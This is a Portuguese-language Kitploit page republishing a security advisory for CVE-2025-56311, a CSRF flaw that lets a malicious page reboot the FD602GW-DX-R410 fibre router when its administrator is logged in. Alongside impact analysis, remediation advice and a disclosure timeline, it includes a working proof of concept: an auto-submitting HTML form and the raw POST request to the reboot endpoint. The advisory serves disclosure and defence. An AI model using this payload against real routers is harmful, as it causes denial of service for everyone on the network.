Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-56311 — Vulnerabilidade de CSRF no roteador FD602GW-DX-R410 permite que atacantes remotos reiniciem o dispositivo por meio de uma requisição POST maliciosa para /boaform/admin/formReboot quando um administrador está autenticado. | Kitploit
Ferramentas/GitHubGitHub/wrathfuldiety/cve-2025-56311
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubwrathfuldiety/cve-2025-56311

CVE-2025-56311

Vulnerabilidade de CSRF no roteador FD602GW-DX-R410 permite que atacantes remotos reiniciem o dispositivo por meio de uma requisição POST maliciosa para /boaform/admin/formReboot quando um administrador está autenticado.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 11 mesesAinda não revisado

CVE-2025-56311: Aviso de Segurança – Vulnerabilidade CSRF na Função de Reinicialização do Roteador FD602GW-DX-R410

Prova de Conceito e Aviso de Segurança para uma vulnerabilidade de Cross-Site Request Forgery (CSRF) na interface administrativa do roteador de fibra FD602GW-DX-R410 (Firmware V2.2.14). O aviso descreve o impacto, o vetor de ataque e as recomendações para remediação.

fd602gw-dx-r410-csrf-advisory

A vulnerabilidade CSRF no roteador FD602GW-DX-R410 permite que atacantes remotos reinicializem o dispositivo por meio de uma solicitação POST maliciosa para /boaform/admin/formReboot quando um administrador está autenticado.


Visão Geral

Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) foi descoberta no console administrativo baseado na web do roteador de fibra FD602GW-DX-R410 (Firmware V2.2.14). O endpoint /boaform/admin/formReboot permite que solicitações POST acionem uma reinicialização completa do dispositivo sem tokens CSRF ou validação de origem. Se um administrador autenticado visitar uma página maliciosa, o roteador pode ser reinicializado remotamente sem consentimento.

  • ID do CVE: CVE-2025-56311
  • Data de Publicação do Aviso: Julho de 2025
  • Descoberto por: Hasanka Amarasinghe (Pesquisador de Segurança Independente)
  • Fornecedor: Shenzhen C-Data Technology Co., Ltd.
  • Produto Afetado: Roteador de Fibra FD602GW-DX-R410
  • Versão do Firmware: V2.2.14 (Build.1918.241111)
  • Versão do Hardware: R410.1B
  • Versão do Bootloader: V3.7-2312181457
  • Servidor Web: Boa/0.93.15
  • Vetor de Acesso: Remoto (O administrador autenticado deve estar conectado)
  • Severidade: Média
  • Pontuação Base CVSS v3.1: 5.4 (Média)

Produto Afetado

  • Dispositivo: Roteador de Fibra FD602GW-DX-R410
  • Firmware: V2.2.14 (Build.1918.241111)
  • Componente: Manipulador de Reinicialização - /boaform/admin/formReboot
  • Servidor Web: Boa/0.93.15

Detalhes da Vulnerabilidade

  • Tipo: Cross-Site Request Forgery (CSRF)
  • Vetor de Ataque: Remoto (o administrador deve estar conectado à sua sessão)
  • Autenticação: Nenhuma exigida para o atacante (sessão de administrador exigida no navegador da vítima)
  • Impacto: Reinicialização não autorizada do dispositivo
  • Persistência de Estado: Sessão sem estado (stateless), provavelmente rastreada via IP ou tokens de sessão internos

Prova de Conceito (PoC)

Payload CSRF (HTML)

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Pro -->
  <body>
    <form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
      <input type="hidden" name="postSecurityFlag" value="+65535" />
      <input type="submit" value="Submit" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Requisição HTTP

root@kitploit:~
POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

postSecurityFlag=+65535

Resposta

HTTP 200 OK; O roteador reinicia imediatamente.


Recomendações

  • Implemente tokens CSRF e validação estrita de Origin/Referer em todos os endpoints administrativos.
  • Invalide sessões obsoletas ou órfãs e vincule as sessões a cookies seguros.
  • Considere usar CAPTCHA ou solicitações de confirmação antes de executar ações destrutivas como a reinicialização.
  • Restrinja o acesso à interface administrativa apenas a IPs confiáveis ou redes internas.

Vetor de Ataque

  • Exige que o administrador do roteador esteja autenticado (conectado).
  • Um atacante induz a vítima a visitar uma página web maliciosa que aciona silenciosamente uma solicitação POST para o endpoint de reinicialização.
  • O roteador aceita a solicitação forjada e reinicia imediatamente, causando negação de serviço.

Impacto

  • Negação de serviço devido à reinicialização forçada.
  • Perda de disponibilidade de rede para todos os usuários conectados.
  • Possibilidade de combinação com outros problemas (ex.: sequestro de sessão ou XSS) para elevar o impacto.

Cronograma de Divulgação

DataAção
Jun 2025Vulnerabilidade descoberta
Jun 2025Tentativa de divulgação responsável (sem resposta)

Referências

  • Fornecedor: Shenzhen C-Data Technology Co., Ltd.
  • Dispositivo: FD602GW-DX-R410
  • Firmware: V2.2.14
  • Aviso no GitHub: https://github.com/wrathfulDiety/CVE-2025-56311

Aviso Legal

Este aviso é fornecido para fins educacionais e de conscientização sobre segurança. O autor não se responsabiliza pelo uso indevido. Todos os testes foram realizados em um ambiente controlado.

Baixar ferramenta
Jul 2025ID do CVE solicitado à MITRE
Jul 2025Aviso preparado e aguardando publicação
Sep 2025CVE atribuído, aviso tornado público